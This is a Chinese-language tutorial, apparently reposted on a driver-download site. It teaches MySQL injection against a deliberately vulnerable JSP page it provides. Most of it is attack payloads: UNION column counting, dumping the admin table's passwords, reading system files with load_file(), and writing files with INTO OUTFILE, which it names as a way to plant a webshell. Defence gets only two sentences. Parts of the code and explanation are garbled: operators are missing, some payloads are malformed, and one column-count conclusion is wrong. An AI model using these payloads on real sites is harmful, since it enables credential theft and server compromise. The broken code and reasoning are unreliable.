驱动管家:安全、高效、精准的专业驱动下载站!

mysql数据库注射产生的原因 怎么利用mysql漏洞?

2018-01-14 10:34:53责编:llp   来源:驱动管家     人气:

鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教.本文需要有基础的SQL语句知识才可以更好的理解.建议想学习的人多去了解一下SQL语句和编程语言,知己知彼才能百战百胜.我不希翼得到读者您的好评,尽管我尽力了;只希望本文能解决您学习过程的障碍,希望您早日掌握有关MYSQL 注入方面的知识.

mysql数据库注射产生的原因 怎么利用mysql漏洞?

1.MYSQL 注射的产生.

漏洞产生原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码.

咱们先创造一个没有过滤的程序. 因为我机器上没有PHP,所以我就是用 JAVA 了,我会详细注释.

代码

数据库:

create database if not exists `test`;

USE `test`;

DROP TABLE IF EXISTS `account`;

CREATE TABLE `account` (

`accountId` bigint(20) NOT NULL auto_increment,

`accountName` varchar(32) default NULL,

`accountPass` varchar(32) default NULL,

PRIMARY KEY (`accountId`)

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

insert into `account` values

(1,’account1’,’account1’);

DROP TABLE IF EXISTS `admin`;

CREATE TABLE `admin` (

`adminId` bigint(20) NOT NULL auto_increment,

`adminName` varchar(32) default NULL,

`adminPass` varchar(32) default NULL,

PRIMARY KEY (`adminId`)

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

insert into `admin` values

(1,’admin’,’admin’);

:

程序:

<%@ page language="java" import="java.util.*,java.sql.*"

pageEncoding="utf-8"%>

<%

//连接MYSQL的字符串.

//jdbc:mysql://localhost:3306/test

//驱动:数据库://地址:端口/数据库名称

String mysqlConnection = "jdbc:mysql://localhost:3306/test";

//加载驱动 com.mysql.jdbc.Driver 是JAVA与MYSQL 连接用的JDBC驱动

Class.forName("com.mysql.jdbc.Driver").newInstance();

//建立MYSQL链接 root是用户名 cx0321 是密码

Connection connection = DriverManager.getConnection(mysqlConnection,

"root", "cx0321");

//建立一个查询对象

Statement statment = connection.createStatement();

//建立一个查询返回集合. 就是说查询完以后返回的数据全部都在这个里面.

ResultSet resultSet = null;

//从account里面读取数据.

resultSet = statment.executeQuery("select * from account where accountId

= ’"request.getParameter("id")"’");

//循环,直到resultSet结束

while(resultSet.next())

{

//从resultSet读取出值输出到页面.

out.print(resultSet.getInt(1) "|");//取出第一列的值,因为是数字类型的所

以是getInt();

out.print(resultSet.getString(2) "|");//取出第二列的值,因为是字符串类

型的所以是getString();

out.print(resultSet.getString(3) "|");

out.print("
");//页面输出换行

}

%>

2.漏洞的利用

(坏狼安全网提供图1)

这个就是数据库里的记录了.以后黄色为关键语句,红色为输入的部分.

大家注意看resultSet = statment.executeQuery("select * from account

where accountId = ’"request.getParameter("id")"’");

这里的request.getParameter("id") 是获取GET 传参的id 参数, 也就是

mysqlInject.jsp?id=1 这里的id. 这样这个SQL 语句就变成了select * from

account where accountId = ’1’ 了.如果加以变换呢?

2.1 漏洞的检测

我们把id 写成mysqlInject.jsp?id=1’ 那么SQL 语句就变成select * from

account where accountId = ’1’’ 了,这样的话SQL 语句就会报错,因为SQL 语句的值

是需要2 个包含符号,比如’和”如果只是数字可以什么都不写.如果不报错的话就说明程序替换,

过滤或者其他方法来防护了.

那么我们可以继续来测验, mysqlInject.jsp?id=1’ and ’’=’ 那么SQL 语句就变

成了select * from account where accountId = ’1’ and ’’ = ’’ ,应该返回正

常.

有些人说我的为什么返回不正常呢? 有2 种原因,第一是程序把恶意字符过滤了;第二是程

序的语句和我写的不一样select * from account where accountId = 1’ and ’’=’.

这个问题在下边会谈到.

2.2 Union 查询猜此次查询列的数量

这里有的人会说猜此次查询列的数量有什么用?如果只是检测当然没有,但是你想进一步的利用那么就有大的用处了,文章后边会讲到的,耐心.如果懂SQL 的人应该知道UNION 查询吧?UNION 查询就是联合查询,执行第二条查询语句将返回值和本次查询合并.

大家想想,如果要和本次查询值合并需要一个什么条件呢?需要联合查询的列数和此次查询的列数相等.如果不想等的话就会无法合并,那么就会报错.通过这一特点聪明的你应该会想出这么才列数了吧?

那么我们要的就是使得UNION 查询出来的列数与本次查询出来的列数相等.也就是说不报错就会相等.

先从第一列开始猜,那么要把这个语句union select 1 构造在地址程序的语句当中.

那么语句就是mysqlInject.jsp?id=1’ and union select 1 and ’’=’ 这样的.

有些人问为什么后边(绿色的部分)要加上and ’’=’ 呢? 也许大家记了吧,我们的SQL 语句是需要两个包含符号的,语句select * from account where accountId = ’1’ 我们输入的是在1 那个位置,所以要去除后边的’,否则语句会报错的.在本程序里也就是’ 如果你要想消除’ 有很多办法,为了让大家明白所以我现在使用and

’’=’.先说一说有几种办法消除这个’

1. 使用 and ’’ = ’ 虽然不够方便,但是在复杂SQL 语句里不会报错的.

2. 使用注释 # 或者 , 这样可以把后面的东西全部注释掉,但是有一个大问题,就

是在执行复杂SQL 语句的时候有可能会报错.

有些人测试,咦?为什么我加了#还是会报错呢?因为本次是使用GET 传参,在地址栏传参.大家想想,当初下载带#名称的数据库是什么样子呢?哦,对了,#是地址栏的结束符,就是说#包括#以后的字符全部不传入.所以#在GET 模式下注入注入不起作用.

那么有些工具写的在构造注射的时候为什么是mysqlInject.jsp?id=1’andunionselect1and’’

= ’/* 呢? 因为在程序里边有函数可以把传入参数里面的空格去除,如果去除了空格,将会是程序产生了错误的语句,那么就会一直报错了.所以有些工具就是用这种东西来取代空格了.

那 又是什么呢? 是一种注释,叫做文档注释,就是从 结束,中间任何代码都会成为注释,所以是程序员在写大量注释时候所使用的一种注释.那最后的/* 是什么呢? 那个是用来解决 SQL 语句 包含符号没有成双成对的.

我们开始测试.

mysqlInject.jsp?id=1 ’unionselect1/*

select * from account where accountId = ’1

’unionselect1/*’.

注意到最低下那句话了吗?

javax.servlet.ServletException: The used SELECT statements have a

different number of columns

大概意思是”这个使用的查询列数不同”,由此得出此次查询不是查询了一个表.

以此类推, select 1 select 1,2 select 1,2,3 知道正确位置,那么你现在说写的列数也

就是本次查询的列数了.

大家看到地下返回 1|2|3| ,这个值是从咱们的UNION查询里合并出来的. 试试把UNION

SELECT 1,2,3 换成 UNION SELECT 4,5,6 看看.地下是不是编程了 4|5|6| 了?

有人说 你都是骗人的 我怎么换,我都换到789 了也没有出来,还是现实原来的数据,你骗

人;我没有骗人,我也不会骗人;那为什么出不来?

有些程序写的时候只是把数据返回集合的第一行输出,但是UNION 查询以后是把数据合并

到此次查询以后,那么他只输出了此次查询的数据,其实UNION 查询的数据也有,但是他没有输

出.那怎么办呢?聪明的人一定会想到. 啊,原来如此,只要让此次查询不输出就可以了.哈哈哈,

我聪明了,可是怎么让此次查询不输出呢? 先告诉大家一个简单的方法,看看SQL 语句,我们是

做过限制条件的. Where accountid = ? ,那么也就是说让这个accoundId 限制到一个没

有的id 上那么不就会没有了? 心动不如行动,试试.

mysqlInject.jsp?id=1000’unionselect4,5,6/*

select * from account where accountId

=1000’unionselect4,5,6/*

哈哈,果然没有了!!! 注意绿色的部分,指定查询一个没有的id ,那么他理所当然的就会

蒸发了.

2.3 低几率另类猜此次查询列的数量

此方法虽然几率低一点,但是会大大减少工作量的.次方法只适用于 select * 的简易

SQL 语句.

这个方法是用的是 mysql 里的 order 排序. 排序是按照顺序排下来.我们来写一条

SQL 语句. Select * from account where accountId = ’1’ order by accountId

那么这个SQL 语句也就是根据 accountId 升序排序. 那么我们不知道他有什么怎么办,而且

这怎么猜? 这里是关键问题. MYSQL 支持列编号排序Select * from account where

accountId = ’1’ order by 1 这样也就是按照第一列排序.

哎呀,你又在骗我们,排序怎么猜列的数量? 那么我按照一个不存在的列排序呢? 比如第四

列? 你一般身上有3 个口袋,一个最多10 元钱,一天吃一顿,一顿3 斤米,一斤米一元,但是你今

天吃了4 斤米,需要40 元,你却只有3 个口袋,你就没有40 元,你就要挨打了.

也就是说一共有3 个列,order by 3 ,按照第3 列排序,正常,order by 4,按照第4

列排序,没有第4 列,出错.那么也就说明他有4 列.

这种方法是根据人的经验判断的.我一般使用这个方法都会成功,就是不成功也相差不多.

2.4 使用UNION 猜其他表,查询其他表

使用此方法可以查询到其他表里的内容.比如查询管理员的密码等.但是有个前题,必须道要

才表的表名和列名. 那怎么才能知道呢? 猜!!! 因为MYSQL 和SQLSERVER 的系统函数不一

样,SQLSERVER 里有 SP_HELPDB 而MYSQL 里没有,所以只能猜了.

好,开始构造语句. 我们要猜看看有没有admin 表.

mysqlInject.jsp?id=1’unionselect4,5,6fromadmin/*

SQL : select * from account where accountId =

’1’unionselect4,5,6fromadmin/*’

如果正常的有admin 表的话,那么返回是正常的,如果没有的话会报错的.

大家看到了吧? 有admin 这个表,为了让大家更好的理解,我们在猜一个其他不存在的表.

mysqlInject.jsp?id=1’unionselect4,5,6fromhelloword/*

SQL : select * from account where accountId =

’1’unionselect4,5,6from helloword/*’

看到了吧?没有 helloworld 这个表.所以报错了.

又问,为什么还是会写4,5,6 呢? 啊哈,因为我们不知道他的列名,如果写了 * 他将会全部列

出来,如果和此次查询的列不相等,那么就会报错了.所以要写一个相等的.

现在表名出来了,怎么才列名呢?哎呀,大家太聪明了,直接把4,5,6 其中一个替换成列名

不久行了? 那么构造出.

mysqlInject.jsp?id=1’unionselectadminId,5,6fromadmin/*

SQL : select * from account where accountId =

’1’unionselectadminid,5,6fromadmin/*’

看见了吗? 1|5|6 的一就是 adminid.如果正常那么就是存在了. 大家可以把列名猜出来,然后

带入UNION 查询中,这样就查出来管理员帐号或者密码了.现在我要把列名一次全部带入.

mysqlInject.jsp?id=1’unionselectadminId,adminName,adminPassfromadmin/*

SQL : select * from account where accountId =

’1’unionselectadminid,adminName,adminPassfromadmin

/*’

哈哈,出来了, 1|admin|admin| 就是 adminid|adminName|adminPass|

也可以在union 查询上限制条件,比如你知道有admin 这个用户那么就构造 union select

adminId,adminName,adminPass from admin where adminName = ‘admin’,看个人的发挥了.

2.5 使用MYSQL 系统函数.

2.5.1.1.1 使用 load_file() 函数 显示文件.

Load_file 顾名思义.就是加载文件,可不是运行啊,是显示内容,但是必须对文件拥

有读取权限.我们先来构造一个显示 c:\boot.ini 文件的语句.

mysqlInject.jsp?id=1’unionselect1,load_file(0x633A5C626F6F742E696E69),

3/*

SQL : select * from account where accountId =

’1’unionselect1,

load_file(0x633A5C626F6F742E696E69),3/*’

看到了吗? C:\boot.ini 文件的内容. 又问,为什么load_file() 里面是

乱码呢? 那不是乱码,那个是C:\boot.ini 16 进制编码. 因为本函数无法处理

直接写的路径,只能能使用16 进制或者是 Ascii 编码.所以要将路径转换成 16

进制或者是Ascii 编码才可以执行.

又问,为什么load_file 是在第二列的位置上,不是在第一列或者第三列的位置上呢?

因为啊,第一列不行,其他的都可以,第一列是一个 INT 类型,一个数字类型,难道你会

把你女朋友送进男厕所吗? 呵呵.玩笑.如果是在 linux 下可以使用 / 来列目录 ,但

是必须有列目录的权限.

通过load_file 可以列目录,读文件,但是遇到文件格式编码的时候也许会遇到乱码

的问题. 这个问题可以这么解决. 使用 subString 函数, subString(字符串,开始,返

回).

假设我们要返回第三个字符, 那么就是

mysqlInject.jsp?id=1’unionselect1,substring(load_file(0x633A5C626F6F742

E696E69),3,1) ,3/* 这样我们就返回了第三个字符,用于解决乱码是非常好的办法.

我近期会做一个这样个工具,将会公布在我的个人主页上.

2.5.1.1.2 使用outfile 写WEBSHELL.

mysql 有一个功能,就是把查询的结果输出.就是outfile.先来构造一个简单的语句.

select ‘hello word’ into outfile ‘c:\\a.txt’ 这里是讲 ‘hello word’ 输出到 c:\a.txt

那么在网站也来构造一下.

mysqlInject.jsp?id=1’unionselect1,’hello’,3intooutfile’c:\\hello.txt’/

*

SQL : select * from account where accountId =

’1’unionselect1,

’hello’,3intooutfile’c:\\hello.txt’/*’

成功插入.但是为什么会报错呢?哦,那是因为你把数据写到文件中,返回集合什

么都没有了,当然会报错了.如果你把hello 换成 一句话或者其他的,如果写入

到网站目录下,那是多么恐怖啊…

2.5.1.1.3 System 系统命令

如果使用system 就相当于SQLSERVER 的xp_cmdshll 一样.

2.漏洞的防护和总结

通过过滤特殊关键字来防护.代码网站很多,我这里就不写了.

针对JAVA 有一种防护措施,就是使用PreparedStatement 对象进行查询,这里也不多说

了.

本文只是一个概括的讲述,如果应用到实战当中需要结合经验.

  •  linux防火墙怎么设置? 防火墙在linux系统上的应用

    linux防火墙怎么设置? 防火墙在linux系统上的应用

    iptables 这个指令, 如同以下用 man 查询所见, 它用来过滤封包和做NAT Network Address Translation(网路位址转译), 这个指令的应用很多, 可以做到很多网路上的应用 iptables - administration tool

    详情2018-01-04 08:58:02责编:llp   来源:驱动管家     
  • 怎么查证你的浏览器存在ie漏洞?

    怎么查证你的浏览器存在ie漏洞?

    JavaScript IE 6 漏洞   其利用代码如下: <script type= "text jscript "> function init() { document write( "The time is: " Date() ); } window onload = init; < script>  利用此代码可

    详情2018-01-10 09:59:11责编:llp   来源:驱动管家     
  • openssl漏洞有哪些?openssl漏洞导致信息泄露

    openssl漏洞有哪些?openssl漏洞导致信息泄露

    小编带来了openssl漏洞详情,想知道openssl重大安全漏洞具体是什么情况吗?会不会威胁到我们的财产安全呢?下文将会为大家详细介绍,网友们可以来了解一下。昨日,OpenSSL(为网络通信提供安全及数据完整性的一种安

    详情2018-01-08 13:56:46责编:llp   来源:驱动管家     
  • 怎么使用cryptsetup加密u盘?如何在ubuntu里创建一个加密u盘?

    怎么使用cryptsetup加密u盘?如何在ubuntu里创建一个加密u盘?

    首先讲讲保护U盘的重要性笔记本和U盘被盗,是过去几年数据泄露的主要原因之一。然而比起笔记本电脑,人们通常不太重视U盘这个小玩意儿的安全。但是如果罪犯偷窃了一枚价值只有12美元的U盘,也许会让一家公司付出

    详情2018-01-04 12:22:51责编:llp   来源:驱动管家     
  • 电脑防火墙在哪里设置?防火墙的设置方法(iptables篇)

    电脑防火墙在哪里设置?防火墙的设置方法(iptables篇)

    Firewall 防火墙,工作在网络或主机的边缘,对进出本网络或主机的数据包根据事先设置好的规则进行检查并且能够在数据包匹配到之后由预置的动作进行处理的组件的组合,有规则(符合条件,就有规则指定的动作进行处

    详情2018-01-05 13:27:00责编:llp   来源:驱动管家     
  • cmos的密码怎么破解?cmos破解密码的方法

    cmos的密码怎么破解?cmos破解密码的方法

    1 简单的DOS下DEBUG破解程序:用软盘启动进入DOS下,执行Debug程序(你没有,那得去拷贝一个啊)1)debugo 70 2e (回车)o 71 00 (回车)o 70 2f (回车)o 71 00 (回车)然后重新启动,就一进入C

    详情2018-01-08 15:03:45责编:llp   来源:驱动管家     
  • 搜狐微博也有漏洞?搜狐微博的漏洞和修复方法分析

    搜狐微博也有漏洞?搜狐微博的漏洞和修复方法分析

    搜狐某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博

    详情2018-01-13 16:51:22责编:llp   来源:驱动管家     
  • 服务器有哪三大攻击杀手?什么是cc攻击?

    服务器有哪三大攻击杀手?什么是cc攻击?

    服务器方法有很多 如网站在同一时间受到大量的访问流量 超过网站服务器所能承受的限制 那么网站所解析的服务器就会崩溃。主流的服务器攻击方式有多种手段,但是唯独DDoS攻击、CC攻击以及ARP欺骗,这些攻击方式

    详情2018-01-13 14:51:31责编:llp   来源:驱动管家     
  • 网站域名被劫持了怎么办?网站域名被劫持的预防方法

    网站域名被劫持了怎么办?网站域名被劫持的预防方法

    网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 出现网站域名跳转到其他网站,这一现象很可能是域名被劫持。【网站域名被劫持——概念】简单来说,域名劫持就是把原本准备访问某网站的用户,在不

    详情2018-01-07 15:53:11责编:llp   来源:驱动管家     
  • pcanywhere远程连接的密码文件怎么得到?

    pcanywhere远程连接的密码文件怎么得到?

      问题的关键就是要得到PCAnyWhere的密码文件(* CIF),然后使用PCanyWhere密码查看工具

    详情2018-01-07 18:08:16责编:llp   来源:驱动管家